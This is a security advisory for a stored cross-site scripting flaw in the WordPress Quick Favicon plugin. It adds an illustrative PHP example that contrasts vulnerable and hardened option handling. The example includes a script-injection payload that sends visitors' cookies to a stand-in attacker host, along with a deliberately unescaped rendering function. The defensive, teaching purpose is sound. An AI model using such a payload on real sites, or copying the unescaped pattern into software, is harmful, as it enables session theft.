Impact
Improper neutralization of input during web page generation (CWE-79) allows an attacker to store malicious JavaScript in data the plugin persists, which is later emitted unescaped into the site's pages. This is a stored cross-site scripting flaw: the script executes in the browser of every visitor who loads an affected page, with that visitor's privileges, so it can be leveraged for cookie theft, session hijacking, defacement, or delivery of secondary payloads. If the victim is a logged-in administrator, the injected script can perform any action that administrator is permitted to take.
Affected Systems
WordPress sites running the Quick Favicon plugin by Robert Cummings, version 0.22.8 or earlier, are affected. The vulnerable code path is the plugin's admin-area functionality that accepts user input and stores it without proper sanitization, so that it is later rendered into pages without escaping. Verify the installed version from the Plugins screen in the dashboard or with `wp plugin list` before deciding whether a site is in scope.
Risk and Exploitability
A CVSS score of 5.9 places this vulnerability at medium severity, and an EPSS score below 1 % indicates a low estimated probability of exploitation at the time of analysis. It is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The likely attack path is for an attacker to submit a payload through a feature that persists data (such as a plugin option) and for that stored data to be displayed to other users later. This implies the attacker needs access to the site's configuration interface, or to another interface that accepts content submissions, so the flaw is most dangerous where such a feature is reachable by lower-privileged accounts or where an attacker has already obtained credentials. EPSS estimates exploitation likelihood, not impact; sites that expose the affected input path to untrusted users should still update.
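The following is an added illustration of the stored-XSS pattern described in the Impact and Risk sections above; it is not code from the Quick Favicon plugin or from OpenCVE, and the option store and function names are hypothetical stand-ins for WordPress's `update_option()`/`get_option()` and the plugin's own rendering code. It shows a favicon-URL option saved and echoed without neutralization next to a hardened version that validates the URL on save and escapes it on output.

```php
<?php
// Added example, not the Quick Favicon plugin's own code. It models the
// CWE-79 pattern the advisory describes: a plugin option submitted from an
// admin form, stored, and later emitted into every page's <head>.
// $options, the save_*/render_* functions and the payload are constructed
// for this example.

// Stand-in for WordPress's options table (update_option()/get_option()).
$options = [];

function save_favicon_option_vulnerable(array &$options, string $input): void {
    // No sanitization: whatever the admin form submits is stored verbatim.
    $options['favicon_url'] = $input;
}

function render_favicon_vulnerable(array $options): string {
    // No output escaping: the stored value is concatenated straight into HTML,
    // so a value that closes the href attribute can inject a <script> element.
    return '<link rel="icon" href="' . ($options['favicon_url'] ?? '') . '">';
}

function save_favicon_option_hardened(array &$options, string $input): void {
    // Validate at save time: accept only a syntactically valid http(s) URL.
    // In WordPress this would be esc_url_raw() behind a capability and nonce check.
    $url = filter_var(trim($input), FILTER_VALIDATE_URL);
    $scheme = $url === false ? '' : strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if ($url === false || !in_array($scheme, ['http', 'https'], true)) {
        $options['favicon_url'] = '';
        return;
    }
    $options['favicon_url'] = $url;
}

function render_favicon_hardened(array $options): string {
    // Escape at output time regardless of what was stored (WordPress: esc_attr()/esc_url()).
    // ENT_QUOTES matters here because the value lands inside a double-quoted attribute.
    $safe = htmlspecialchars($options['favicon_url'] ?? '', ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return $safe === '' ? '' : '<link rel="icon" href="' . $safe . '">';
}

// Constructed payload: closes the href attribute, injects a script that exfiltrates
// document.cookie, then reopens an attribute so the original markup stays well-formed.
$payload = '"><script>document.location="https://attacker.example/?c="+document.cookie</script><link href="';

// 1. Vulnerable path: the payload is stored as-is and reproduced verbatim in the page.
save_favicon_option_vulnerable($options, $payload);
echo render_favicon_vulnerable($options), "\n";

// 2. Defence in depth: even with the payload already stored, escaped output neutralizes it.
echo render_favicon_hardened($options), "\n";

// 3. Hardened save rejects the payload outright, so nothing is stored.
save_favicon_option_hardened($options, $payload);
echo render_favicon_hardened($options), "\n";

// 4. A legitimate value passes validation and renders unchanged.
save_favicon_option_hardened($options, 'https://example.com/favicon.ico');
echo render_favicon_hardened($options), "\n";
```

Run it with `php example.php`. Step 1 prints markup in which the `<script>` element sits outside the attribute and would execute for every visitor; step 2 prints the same stored value with `"`, `<` and `>` converted to entities, so it stays inert text inside the attribute; step 3 prints nothing because the payload is not a valid http(s) URL. The two controls are independent: validation on save limits what reaches the database, and escaping on output protects pages even when a value was stored by an older, unpatched version of the code.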